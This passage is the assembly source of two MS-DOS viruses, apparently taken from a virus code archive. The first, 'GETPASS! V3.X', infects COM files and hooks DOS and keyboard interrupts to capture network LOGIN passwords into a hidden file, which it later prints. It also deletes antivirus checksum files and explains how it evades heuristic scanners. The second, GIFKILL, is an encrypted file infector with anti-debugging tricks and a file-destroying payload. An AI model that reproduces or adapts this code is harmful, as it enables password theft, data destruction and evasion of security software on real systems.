JNB BETWEEN ;Yes, find another.
CMP AX,MINLEN ;Is it to short?
JBE BETWEEN ;Yes, find another.
MOV AH,3Eh ;Close the file.
INT 21h ;Call DOS
RET ;Return to caller.
;-----------------------------------------------------------------------------
CHKDRV: CALL CHKDOS ;Check DOS version.
CMP AL,01 ;
JB DUMEX ;Screw up TbClean.
CMP AL,05h ;Is it DOS 5.0 or higher?
JNGE EXIT4 ;No, exit.
MOV AH,19h ;Get drive code.
INT 21h ;Call DOS.
MOV BYTE PTR[BP+OFFSET OLDRV],AL;Save old drive code.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RESBEG: LEA SI,[BP+OFFSET ORIGNL] ;Offset original begin.
MOV DI,0100h ;Restore original instructions.
MOV CX,3 ;Restore 3 bytes.
REPNZ MOVSB ;Move them.
RET ;Return to caller.
;-----------------------------------------------------------------------------
CHKCOM: MOV CX,05 ;CX=len COMMAND.
MOV DI,[BP+OFFSET NP] ;Offset found file.
LEA SI,[BP+OFFSET COMMND] ;Offset COMMAND.
REPZ CMPSB ;Compare the strings.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RENAME: MOV CX,0Ch ; This section renames the
MOV SI,WORD PTR[BP+OFFSET NP]; found and approved for
LEA DI,WORD PTR[BP+OFFSET NEWNAM]; infection file to a
REPNZ MOVSB ; *.TXT file. The reason for
LEA BX,WORD PTR[BP+OFFSET NEWNAM-1];this is that VPROTECT from
LPOINT: INC BX ; Intel has a rule based NLM.
CMP BYTE PTR[BX],'.' ; If we write to a COM file
JNE LPOINT ; VPROTECT gives an alarm
MOV DI,BX ; message. However, if we
MOV WORD PTR[BP+OFFSET TXTPOI],BX; write to a text file....
LEA SI,[BP+OFFSET TXT] ; Pretty solution isn't it?
MOVSW ;
MOVSW ;
MOV DX,WORD PTR[BP+OFFSET NP];
LEA DI,WORD PTR[BP+OFFSET NEWNAM];
MOV AH,56h ;Rename file function.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RENAME2:LEA SI,[BP+OFFSET SPEC+1] ; In this section we
MOV DI,WORD PTR[BP+OFFSET TXTPOI]; give the infected file
MOVSW ; its old extention back.
MOVSW ; (*.COM)
MOV DX,WORD PTR[BP+OFFSET NP];
LEA DI,WORD PTR[BP+OFFSET NEWNAM];
MOV AH,56h ;Rename file function.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
ENKEY: CALL CHKTIME ;Get time.
MOV BYTE PTR[BP+OFFSET VAL_1],DL;New encryption key.
RET ;Return to caller.
;-----------------------------------------------------------------------------
SAVEDIR:MOV BYTE PTR[BP+OFFSET BUFFER],5Ch;Put a slash in DTA.
MOV DL,BYTE PTR[BP+OFFSET OLDRV];Drive code.
INC DL ;DL+1 because functions differ.
MOV AH,47h ;Get current directory.
LEA SI,[BP+OFFSET BUFFER+1] ;Store current directory.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
DTA: MOV AH,2Fh ;Get DTA address.
INT 21h ;Call DOS.
MOV WORD PTR[BP+OFFSET OLD_DTA],BX; Save here.
LEA DX,[BP+OFFSET NEW_DTA] ;Offset new DTA address.
MOV AH,1Ah ;Give up new DTA.
INT 21 ;Call DOS.
ADD DX,1Eh ;Filename pointer in DTA.
MOV WORD PTR[BP+OFFSET NP],DX;Put in name pointer.
RET ;Return to caller.
;-----------------------------------------------------------------------------
INT24: MOV AX,3524h ;Get int 24 handler.
INT 21h ;into [ES:BX].
MOV WORD PTR[BP+OLDINT],BX ;Save it.
MOV WORD PTR[BP+OLDINT+2],ES;
MOV AH,25h ;Set new int 24 handler.
LEA DX,[BP+OFFSET NEWINT] ;DS:DX->new handler.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RINT24: PUSH DS ;Save data segment.
MOV AX,2524h ;Restore int 24 handler
LDS DX,[BP+OFFSET OLDINT] ;to original.
INT 21h ;Call DOS.
POP DS ;Restore data segment.
RET ;Return to caller.
;-----------------------------------------------------------------------------
VSAFE: MOV AX,3516h ;Get interrupt vector INT 16.
INT 21h ;(Now we know in wich segment it is.)
MOV WORD PTR[BP+OFFSET NINT16],BX; - Store old INT 16 in TSR.
MOV WORD PTR[BP+OFFSET NINT16+2],ES;/
ADD BX,0364h ;Here we find a jump that w'ill change.
CMP WORD PTR[ES:BX],0945h ;Is it THE jump?
JNE OK_9 ;No, already modified or not resident.
MOV WORD PTR[ES:BX],086Dh ;Yes, modify it.
OK_9: RET ;Return to caller. No Vsafe.
;-----------------------------------------------------------------------------
FIND1: MOV BYTE PTR[BP+OFFSET VAL_2],0FFh; This routine is derivied from
MOV BX,01h ; the VIENNA virus.
FIND2: PUSH ES ;- Save registers.
PUSH DS ;/
MOV ES,DS:2CH ;
MOV DI,0 ;ES:DI points to environment.
FPATH: LEA SI,[BP+OFFSET PATH] ;Point to "PATH=" string in data area.
LODSB ;
MOV CX,OFFSET 8000H ;Environment can be 32768 bytes long.
REPNZ SCASB ;Search for first character.
MOV CX,4 ;Check if path
LOOP_2: LODSB ;is complete.
SCASB ;
JNZ FPATH ;If not all there, abort & start over.
LOOP LOOP_2 ;Loop to check the next character.
XCHG SI,DI ;Exchange registers.
MOV CL,BYTE PTR[BP+OFFSET VAL_2];Random value in CL.
PUSH ES ;\
POP DS ;-) Get DS, ES on address.
POP ES ;/
OK_14: LEA DI,[BP+OFFSET NEW_DTA+50];Offset address path.
OK_10: MOVSB ;Get name in path.
MOV AL,[SI] ;
CMP AL,0 ;Is it at the end?
JE OK_11 ;Yes, replicate.
CMP AL,3Bh ;Is it ';'?
JNE OK_10 ;Nope, next letter.
INC SI ;For next loop. ';'=';'+1.
INC BX ;
LOOP OK_14 ;Loop until random value = 0.
OK_11: POP DS ;Restore data segment.
MOV AL,0 ;Place space after the directory.
MOV [DI],AL ;
RET ;Return to caller.
;-----------------------------------------------------------------------------
DELSTUF:MOV BX,01h ;Set counter
PUSH BX ;and push it.
LEA DX,[BP+OFFSET MICRO] ;Is there a CHKLIST.MS file?
JMP INTER ;Check it out.
SECOND: LEA DX,[BP+OFFSET TBAV] ;Is there a ANTI-VIR.DAT file?
INC BX ;Increase counter
PUSH BX ;and push it.
JMP INTER ;Check it out.
THIRD: LEA DX,[BP+OFFSET CENTRAL] ;Is there a CHKLIST.CPS file?
INC BX ;Increase counter
PUSH BX ;and push it
INTER: MOV AH,4Eh ;Find first matching entry.
MOV CX,110b ;Search all attributes.
INT 21h ;Call DOS.
JC NODEL ;No match, find next.
CALL ATTRIB ;Clear attributes.
MOV AH,41h ;Delete file.
INT 21h ;Call DOS.
NODEL: POP BX ;Pop counter.
CMP BX,01 ;Had the first one?
JE SECOND ;Yes, do the second.
CMP BX,02 ;Was it the second?
JE THIRD ;Yes, do the third.
RET ;Finished, return to caller.
;-----------------------------------------------------------------------------
CHDRIVE:MOV CX,0FFFFh ;Clear CX.
MOV BL,'A'-1 ;AH=40
OK_15: INC BL ;AH=41='A'
INC CX ;CX=1
CMP BL,BYTE PTR[BP+OFFSET NEW_DTA+50];New drive letter.
JNE OK_15 ;Not the same, go again.
MOV DL,CL ;Calculated the new drive code.
MOV AH,0Eh ;Give up new drive code.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RTIME: MOV AX,5701h ;Restore time & date.
MOV CX,WORD PTR[BP+OFFSET TIME];Old time.
MOV DX,WORD PTR[BP+OFFSET DATE];Old date.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
STIME: MOV AX,5700h ;Get file date & time.
MOV BX,[BP+OFFSET HANDLE] ;File Handle.
INT 21h ;Call DOS.
MOV WORD PTR[BP+OFFSET TIME],CX;Store time.
MOV WORD PTR[BP+OFFSET DATE],DX;Store date.
RET ;Return to caller.
;-----------------------------------------------------------------------------
BPOINT: XOR DX,DX ;Zero register.
MOV AX,4202h ;Move file pointer to top.
XOR CX,CX ;Zero register.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
ACTIVE: PUSH DS ;Save register.
INT 17h ;Check for NETX.
CMP AH,01h ;NETX resident?
JNE RESID ;Nope, do not install TSR.
CALL CREATE ;If not exsists, create password file.
CALL TIMER ;Time to print the password file?
MOV AX,3D3Dh ;Do resident check.
INT 21h ;Call BIOS.
CMP AX,1111h ;Already resident?
JE RESID ;If so, exit.
MOV AX,0044h ;Move code into hole in system
MOV ES,AX ;memory.
MOV DI,0100h ;ES:BX = 0044:0100
LEA SI,[BP+OFFSET TSR] ;Begin here
MOV CX,TSRLEN ;and this many bytes.
REP MOVSB ;Do it.
MOV DS,CX ;Get original INT 21 vector
MOV SI,0084h ;DS:SI = 0000:0084
MOV DI,0100h+NINTOF ;Store it in TSR
MOVSW ;One word,
MOVSW ;and another.
PUSH ES ;Restore register.
POP DS ;Restore register
MOV AX,2521h ;Give up new INT 21 vector.
MOV DX,0100h+INTOF ;Offset new INT 21.
INT 21h ;Call DOS.
MOV AX,2516h ;Give up new INT 16 vector.
MOV DX,0100h+INT16L ;Offset new INT 16.
INT 21h ;Call DOS.
RESID: POP DS ;- Restore register.
RET ;Return to caller.
;-----------------------------------------------------------------------------
TSR: DB 0 ; This is THE cool part!
;-----------------------------------------------------------------------------
INT21: CMP AX,4B00h ;Execute?
JE OK_16 ;Yep, do IT !
CMP AX,3D3Dh ;Resident check?
JNE DO_OLDI ;Nope, do original INT 21.
MOV AX,1111h ;Give up resident FLAG.
IRET ;Return to viral code.
DO_OLDI:JMP DWORD PTR CS:[0100+NINTOF];Do the original INT 21.
OK_16: PUSH BX ;\
PUSH CX ; \
PUSH DX ; ) Save registers.
PUSH DS ; /
PUSH ES ;/
MOV SI,0 ;
MOV BX,DX ;Name pointer into BX.
HERE: CMP BYTE PTR[BX],'.' ;Is it a point?
JE FOLLOW ;Yes, collected the name, cont.
INC BX ;BX+1
JMP HERE ;Get next character.
FOLLOW: SUB BX,05h ;Because LOGIN is 5 characters.
THERE: MOV AL,BYTE PTR [CS:0100+LOGINL+SI];Char into AL.
CMP BYTE PTR[BX+SI],'.' ;Did we make it until the point?
JE GETPASS ;It is LOGIN, get the password!
XOR AL,DS:[BX+SI] ;(XOR LOGIN,LOGIN)
JZ FOLLOW1 ;If XOR = 0 we have an equal char.
JMP ISNOT ;If not, well execute and do nothing.
FOLLOW1:INC SI ;Next char.
JMP THERE ;And compare again. (we must be shure.)
ISNOT: JMP ENDPARS ;Return to caller.
LOGIN DB 'LOGIN',0 ;Used to compare.
KBFLAG DB 0 ;Keyboard interrupt activation flag.
FNAME DB 'C:\DOS\MSD.INI',0 ;Password file specification.
KEYPTR DW 0 ;Keyboard pointer.
CCOUNT DB 0 ;\
CRETURN DB 0 ;/ Carriage return counter.
;-----------------------------------------------------------------------------
GETPASS:MOV BYTE PTR[CS:0100+KFLAG],0FFh;Set interrupt 16 flag.
POP ES ;\
POP DS ; \
POP DX ; ) Restore registers.
POP CX ; /
POP BX ;/
PUSH BX ;\
PUSH CX ; \
PUSH DX ; ) Save registers.
PUSH DS ; /
PUSH ES ;/
MOV DS,ES:[BX+04] ;\ Get param.pointer ES:SI
MOV SI,ES:[BX+02] ;/
PUSH CS ; \
POP ES ; ) Get keybuff pointer DS:DI
MOV DI,OFFSET[CS:0100+KBUFF]; /
XOR CX,CX ;
MOV CL,BYTE PTR DS:[SI] ;CX IS PARAM.LEN.
INC SI ;
INC SI ;
CMP CL,10h ;
JG ENDPARS ;
CMP CL,00h ;No parameters.
JE BRANCH ;
MOV BYTE PTR[CS:0100+COUCR],01h;
ENDFD: INC CX ;
MOV WORD PTR[CS:0100+KPTR],CX;Set keyb.index op len param.
DEC CX ;
REPNZ MOVSB ;
MOV BYTE PTR ES:[DI-1],CR ;
MOV BYTE PTR ES:[DI],LF ;
JMP ENDPARS ;
BRANCH: MOV BYTE PTR[CS:0100+COUCR],02h;
ENDPARS:POP ES ;\
POP DS ; \
POP DX ; ) Restore registers.
POP CX ; /
POP BX ;/
MOV AX,4B00h ;
JMP DWORD PTR CS:[0100+NINTOF];Do the original INT 21.
PARAM DB 0 ;
;-----------------------------------------------------------------------------
INT16: CMP BYTE PTR[CS:0100+KFLAG],0FFh;Is it login.?
JE NEXTCHK ; Yes! Get the password!
THE_END:JMP DWORD PTR[CS:0100+OLD16L];Nope, do old INT 16.
NEXTCHK:CMP AH,00h ; Keyboard funtion call?
JE TAKCHAR ; Yes, continue.
CMP AH,10h ; Keyboard function call?
JNE THE_END ;
TAKCHAR:PUSHF ;Push flag register.
CALL DWORD PTR[CS:0100+OLD16L];Call old INT 16.
PUSH DS ;\
PUSH CS ; \
POP DS ; \
PUSH AX ; ) Save regs and set DS
PUSH BX ; /
PUSH CX ; /
PUSH DX ;/
CMP AL,00H ; No key typed
JE RESREGS ;
MOV BX,WORD PTR[CS:0100+KPTR]; Keybuf index
CMP BX,001Bh ; Max. length of kbuff.
JGE RESREGS ; End int16
CMP AL,CR ; If key = <Return>
JE COUNTCR ;
BACK: MOV BYTE PTR[CS:0100+KBUFF+BX],AL; Copy char into KBuffer
INC BX ;
MOV WORD PTR[CS:0100+KPTR],BX;
RESREGS:POP DX ;\
POP CX ; \
POP BX ; ) Restore regs.
POP AX ; /
POP DS ;/
IRET ; Return
COUNTCR:MOV AL,LF ;Line feed into AL.
DEC BYTE PTR[CS:0100+COUCR] ;Decrease CR counter.
CMP BYTE PTR[CS:0100+COUCR],00h;Is it zero?
JE OVER_2 ;Nope, continue logging.
MOV BYTE PTR[CS:0100+KBUFF+BX],CR; Copy char into KBuffer
INC BX ;
MOV WORD PTR[CS:0100+KPTR],BX;
MOV AL,LF ;
JMP BACK ;
OVER_2: MOV AL,CR ;CR into AL.
MOV BYTE PTR[CS:0100+KBUFF+BX],AL;Copy CR into KBuffer.
INC BX ;Increase buffercounter.
MOV BYTE PTR[CS:0100+KBUFF+BX],LF;Copy char into KBuffer.
INC BX ;Increase buffercounter.
MOV BYTE PTR[CS:0100+KBUFF+BX],LF;Copy char into KBuffer.
CALL WFILE ;Write buffer to the logfile.
MOV BYTE PTR[CS:0100+KFLAG],00h;
MOV WORD PTR[CS:0100+KPTR],00h;
JMP RESREGS ;Restore registers.
WFILE: PUSH AX ;\
PUSH BX ;
PUSH DX ; Save registers.
PUSH CX ;
PUSH DS ;/
PUSH CS ;\ Get Data segment on address.
POP DS ;/
MOV AX,3D02h ;Open file function.
MOV DX,OFFSET[CS:0100+FN] ;Offset file spec.
INT 21h ;Call DOS.
JC FAILURE ;On error, quit.
XCHG BX,AX ;Into BX.
MOV AX,4202h ;Mov file handle to EOF.
XOR CX,CX ;CX=0
XOR DX,DX ;DX=0
INT 21h ;Call DOS.
CMP AX,2000h ;File on max lenght?
JGE FAILURE ;If so, exit.
WRITE: MOV CX,CS:[0100+KPTR] ;BX = keyboard pointer.
ADD CX,03h ;+3.
MOV DX,OFFSET CS:[0100+KBUFF];Offset keyboard buffer.
MOV AH,40h ;Write to file function.
INT 21h ;Call DOS.
FCLOSE: MOV AH,3Eh ;Close file funtion.
INT 21h ;Call DOS.
FAILURE:POP DS ;\
POP DX ;
POP CX ; Restore registers.
POP BX ;
POP AX ;/
RET ;Return to caller.
;-----------------------------------------------------------------------------
NINT21: DW 0 ;- Original INT 21 vector.
DW 0 ;/
NINT16: DW 0 ;- Original INT 16 vector.
DW 0 ;/
KEYBUFF DB 1dh DUP (?) ;Keyboard buffer.
LASTBYT:DB 0 ;Last Resident Byte.
;-----------------------------------------------------------------------------
ATTRIB: MOV DX,WORD PTR[BP+OFFSET NP];Offset in DTA.
MOV AX,4300h ;Ask file attributes.
INT 21h ;Call DOS.
LEA BX,[BP+OFFSET ATTR] ;Save address for old attributes.
MOV [BX],CX ;Save it.
XOR CX,CX ;Clear file attributes.
MOV AX,4301h ;Write file attributes.
INT 21h ;Call DOS.
JNC OK ;No error, proceed.
CALL EXIT ;Oh Oh, error occured. Quit.
OK: RET ;Return to caller.
;-----------------------------------------------------------------------------
RATTRIB:LEA DX,[BP+OFFSET NEWNAM] ;Offset file specification.(name.TXT)
LEA BX,[BP+OFFSET ATTR] ;Offset address old attributes.
MOV CX,[BX] ;Into CX.
MOV AX,4301h ;Write old values back.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
GODIR: LEA DX,[BP+OFFSET NEW_DTA+52];Offset directory spec.
MOV AH,3Bh ;Goto the directory.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RANDOM: CALL CHKTIME ;Get system time.
MOV CX,0 ;Figure this out by yourself.
MOV AX,100d ;It is a random generator with
OK_19: INC CX ;two variable inputs.
SUB AX,BX ;A: How many dir's in the path.
CMP AX,01d ;B: Random system time. (jiffies)
JGE OK_19 ;With this values, we create a
XOR BX,BX ;random value between 1 and A.
OK_20: INC BX ;
SUB DL,CL ;
CMP DL,01d ;
JGE OK_20 ;
MOV BYTE PTR[BP+OFFSET VAL_2],BL;Save value.
RET ;Return to caller.
;-----------------------------------------------------------------------------
BEGIN1: PUSH SP ;
POP BX ;Everything is related to BP.
MOV BP,WORD PTR[BX] ;
SUB BP,10Fh ;In first run BP=0
RET ;
;-----------------------------------------------------------------------------
NEWINT: MOV AL,03h ;New INT 24.
IRET ;No more write protect errors!
;-----------------------------------------------------------------------------
TIMER: PUSH DS ;Save data segment.
MOV AX,0044h ;\
MOV DS,AX ;- DS=resident segment.
CMP BYTE PTR[DS:0100],01h ;Already printed the file?
POP DS ;Restore data segment.
JE NOPRINT ;Yes, once is enough.
MOV AH,2Ah ;Get system date.
INT 21h ;Call DOS.
CMP DL,01h ;Is it the 1st of the month?
JNE NOPRINT ;Nope, don't print the passwords.
MOV AX,3D01h ;Open device PRN (printer)
LEA DX,[BP+OFFSET PRINT] ;Offset spec.
INT 21h ;Call DOS.
MOV DI,AX ;Save handle.
MOV AX,3D00h ;Open Password file.
LEA DX,[BP+OFFSET FNAME] ;File spec.
INT 21h ;Call DOS.
MOV SI,AX ;Save handle.
GOPRINT:MOV AH,3Fh ;Read file function.
MOV BX,SI ;File handle into BX.
MOV CX,01h ;Read one byte.
LEA DX,[BP+OFFSET OUTPUT] ;Into this address.
INT 21h ;Call DOS.
CMP AL,0 ;EOF?
JE READY ;If equal, ready.
MOV AH,40h ;Write to file function.
MOV BX,DI ;File handle into BX.
MOV CX,01h ;Write one byte.
LEA DX,[BP+OFFSET OUTPUT] ;Offset output.
INT 21h ;Call DOS.
JMP GOPRINT ;Next byte.
READY: MOV AH,3Eh ;Close file.
INT 21h ;Call DOS.
PUSH DS ;
MOV AX,0044h ;
mov DS,AX ;Restore data segment.
MOV BYTE PTR[DS:0100],01h ;Already printed the file?
POP DS ;
NOPRINT:RET ;Return to caller.
;-----------------------------------------------------------------------------
INSTSR2:LEA DI,[BP+OFFSET NEW_DTA+0100h];/
LEA SI,[BP+OFFSET INFECT] ;Offset address infection routine.
MOV CX,TSR2LEN ;Length to install.
REP MOVSB ;Install it.
MOV AX,25D0h ;Give up new INT D0 vector.
LEA DX,[BP+OFFSET NEW_DTA+0100h];
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
PRINT DB 'PRN',0 ;Device=printer.
PATH DB 'PATH=' ;Used to find environment.
SPEC DB '*.COM',0 ;File search specification.
TXT DB '.TXT',0 ;Rename file specification.
OUTPUT DB 0 ;Output byte to printer.
TXTPOI DW 0 ;Pointer in specification.
MARK1 DB 0 ;Used for infection check.
VAL_2 DB 0 ;Random value for directory switching.
OLDRV DB 0 ;Old drive code.
BYTES DB 'TBDRVX',0 ;
COMMND DB 'COMM',0 ;
MICRO DB 'CHKLIST.MS',0 ;- Files to be deleted.
CENTRAL DB 'CHKLIST.CPS',0 ;/
TBAV DB 'ANTI-VIR.DAT',0 ;/
VIRNAME DB 'GETPASS! V3.X',0 ;
BEGIN2 DW 0 ;
NWJMP1 DB 0EBh,0 ;
FLAGT DB 0 ;
OLD_DTA DW 0 ;Old DTA addres.
HANDLE DW 0 ;File handle.
TIME DB 2 DUP (?) ;File time.
DATE DB 2 DUP (?) ;File date.
ATTR DB 1 DUP (?),0 ;Attributes.
NEWJMP DB 0E9h,0,0 ;Jump replacement.
ORIGNL DB 0CDh,020h,090h ;Original instrucitons.
DEXIT DB 0CDh,020h,090h ;Dummy exit instructions.
NEWNAM DB 0Dh DUP (?) ;New file name.
OLDINT DW 0 ;Old INT 24 vector.
NP DW ? ;New DTA address.
;-----------------------------------------------------------------------------
INFECT: PUSH BX ;Save file handle.
PUSH DX ;Save encryption key.
PUSH BX ;Save file handle.
CALL ENCRYPT ;Encrypt the virus code.
POP BX ;Restore file handle.
LEA DX,[BP+OFFSET VSTART] ;Begin here.
MOV CX,VIRLEN ;Write this many Bytes.
MOV AH,40h ;Write to file.
INT 21h ;Call DOS.
POP DX ;Restore encryption value.
CALL ENCRYPT ;Fix up the mess.
POP BX ;Restore file handle.
DUMMY: IRET ;Return to caller.
;-----------------------------------------------------------------------------
CREATE: MOV AH,5Bh ;Create file function.
LEA DX,[BP+OFFSET FNAME] ;Offset file spec.
MOV CX,0 ;Normal attributes.
INT 21h ;Call DOS.
JC EXISTS ;File already excists, do the rest.
XCHG AX,BX ;File handle into BX.
MOV CX,INTRO ;Lenght of intro.
LEA DX,[BP+OFFSET INAME] ;Offset text.
MOV AH,40h ;Write to file function.
INT 21h ;Call DOS.
EXISTS: RET ;Return to caller.
INAME: DB 'You are now looking at the name/passwords of '
DB 'your network! ',CR,LF
DB 'Greetings, ThE wEiRd GeNiUs.',CR,LF
DB 'Check your MSD.INI once in a while!',CR,LF,CR,LF
LBIT: DB 0
;-----------------------------------------------------------------------------
;Comment: From here the code remains UN-encrypted.
;-----------------------------------------------------------------------------
CHKTIME:MOV AH,2Ch ;Get system time.
INT 21h ;Call DOS.
CMP DL,0 ;If zero,
JE CHKTIME ;try again.
RET ;Return to caller.
;-----------------------------------------------------------------------------
CHKDOS: MOV AH,30h ;Get DOS version.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
VAL_1 DB 00h ;Encryption Value.
;-----------------------------------------------------------------------------
;Encrypting the virus code is not longer the most important thing to do since
;some of the anti-viral software can decrypt and trace the virus code in a
;simulated way. The en/de-cryption routine is almost the only piece of
;code that stays readable and if it is not a polymorphic virus this code
;always stays the same. The only way we can misguide a heuristic
;scanner is to 'tell' it that we are a normal, respectable program. By first
;performing a set of 'normal' instructions we mislead the scanner until it
;stops tracing the program. The result is that the en/decryption routine is
;not discovered. Since there are no other suspicious instructions in the code
;we remain under cover. This is why I used a very simple encryption method.
;-----------------------------------------------------------------------------
ENCRYP: CALL NEXTL ;-Get BP on address.
NEXTL: POP BX ;/
SUB BX,04 ;[BX]=decryption key.
MOV DL,[BX] ;DL=[BX]
SUB BX,LENGTH ;BX=begin of encrypted code.
CMP DL,0 ;Code Encrypted?
JE NOTENC ;Nope
JMP DECRYPT ;Decrypt.
ENCRYPT:LEA BX,[BP+OFFSET CSTART] ;De/en-crypt from here.
DECRYPT:MOV DH,DL ;
MOV CX,CRYPTLEN ;Set counter.
X_LOOP: XOR [BX],DL ;Xor the code on address BX.
SUB DL,DH ;-To change form of scrambled code.
SUB DH,02Eh ;/
INC BX ;Increase address.
LOOP X_LOOP ;Repeat until done.
NOTENC: RET ;Return to caller.
;-----------------------------------------------------------------------------
BUFFER: DB 64 DUP (?) ;Here we store directory info.
;-----------------------------------------------------------------------------
NEW_DTA: ;Here we put the DTA copy.
;-----------------------------------------------------------------------------
CODE ENDS
END START
;=============================================================================
MSDOS/G-Index/Virus.MSDOS.Unknown.gifkill.asm
+392
View File
@@ -0,0 +1,392 @@
; GIFKILL.ASM -- Seek and Destroy GIF
; Written by Dark Avenger
virus_type equ 0 ; Appending Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
main proc near
db 0E9h,00h,00h ; Near jump (for compatibility)
start: call find_offset ; Like a PUSH IP
find_offset: pop bp ; BP holds old IP
sub bp,offset find_offset ; Adjust for length of host
call encrypt_decrypt ; Decrypt the virus
start_of_code label near
lea si,[bp + buffer] ; SI points to original start
mov di,0100h ; Push 0100h on to stack for
push di ; return to main program
movsw ; Copy the first two bytes
movsb ; Copy the third byte
mov di,bp ; DI points to start of virus
mov bp,sp ; BP points to stack
sub sp,128 ; Allocate 128 bytes on stack
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer on stack
int 021h
stop_tracing: mov cx,09EBh
mov ax,0FE05h ; Acutal move, plus a HaLT
jmp $-2
add ah,03Bh ; AH now equals 025h
jmp $-10 ; Execute the HaLT
lea bx,[di + null_vector] ; BX points to new routine
push cs ; Transfer CS into ES
pop es ; using a PUSH/POP
int 021h
mov al,1 ; Disable interrupt 1, too
int 021h
jmp short skip_null ; Hop over the loop
null_vector: jmp $ ; An infinite loop
skip_null: mov byte ptr [di + lock_keys + 1],130 ; Prefetch unchanged
lock_keys: mov al,128 ; Change here screws DEBUG
out 021h,al ; If tracing then lock keyboard
mov cx,0003h ; Do 3 infections
search_loop: push cx ; Save CX
call search_files ; Find and infect a file
pop cx ; Restore CX
loop search_loop ; Repeat until CX is 0
call get_weekday
cmp ax,0005h ; Did the function return 5?
je strt00 ; If equal, do effect
jmp end00 ; Otherwise skip over it
strt00: lea dx,[di + data00] ; DX points to data
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; All file attributes valid
int 021h
jc erase_done ; Exit procedure on failure
mov ah,02Fh ; DOS get DTA function
int 021h
lea dx,[bx + 01Eh] ; DX points to filename in DTA
erase_loop: mov ah,041h ; DOS delete file function
int 021h
mov ah,03Ch ; DOS create file function
xor cx,cx ; No attributes for new file
int 021h
mov ah,041h ; DOS delete file function
int 021h
mov ah,04Fh ; DOS find next file function
int 021h
jnc erase_loop ; Repeat until no files left
erase_done:
end00:
com_end: pop dx ; DX holds original DTA address
mov ah,01Ah ; DOS set DTA function
int 021h
mov sp,bp ; Deallocate local buffer
xor ax,ax ;
mov bx,ax ;
mov cx,ax ;
mov dx,ax ; Empty out the registers
mov si,ax ;
mov di,ax ;
mov bp,ax ;
ret ; Return to original program
main endp
db 0FAh,045h,02Eh,0B3h,024h
search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,64 ; Allocate 64 bytes on stack
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 64] ; SI points to 64-byte buffer
int 021h
mov ah,03Bh ; DOS change directory function
lea dx,[di + root] ; DX points to root directory
int 021h
call traverse ; Start the traversal
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 64] ; DX points to old directory
int 021h
mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
root db "\",0 ; Root directory
search_files endp
traverse proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first function
mov cx,00010000b ; CX holds search attributes
lea dx,[di + all_files] ; DX points to "*.*"
int 021h
jc leave_traverse ; Leave if no files present
check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
jne another_dir ; If not, try again
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
je another_dir ;If so, keep going
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 98] ; DX points to new directory
int 021h
call traverse ; Recursively call ourself
pushf ; Save the flags
mov ah,03Bh ; DOS change directory function
lea dx,[di + up_dir] ; DX points to parent directory
int 021h
popf ; Restore the flags
jnc done_searching ; If we infected then exit
another_dir: mov ah,04Fh ; DOS find next function
int 021h
jnc check_dir ; If found check the file
leave_traverse:
lea dx,[di + com_mask] ; DX points to "*.COM"
call find_files ; Try to infect a file
done_searching: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
up_dir db "..",0 ; Parent directory name
all_files db "*.*",0 ; Directories to search for
com_mask db "*.COM",0 ; Mask for all .COM files
traverse endp
db 0A6h,03Ch,0B6h,078h,0CCh
find_files proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file
done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_files endp
db 002h,0EFh,034h,048h,091h
infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov si,bx ; SI points to the DTA
mov byte ptr [di + set_carry],0 ; Assume we'll fail
cmp word ptr [si + 01Ah],(65279 - (finish - start))
jbe size_ok ; If it's small enough continue
jmp infection_done ; Otherwise exit
size_ok: mov ax,03D00h ; DOS open file function, r/o
lea dx,[si + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; BX holds file handle
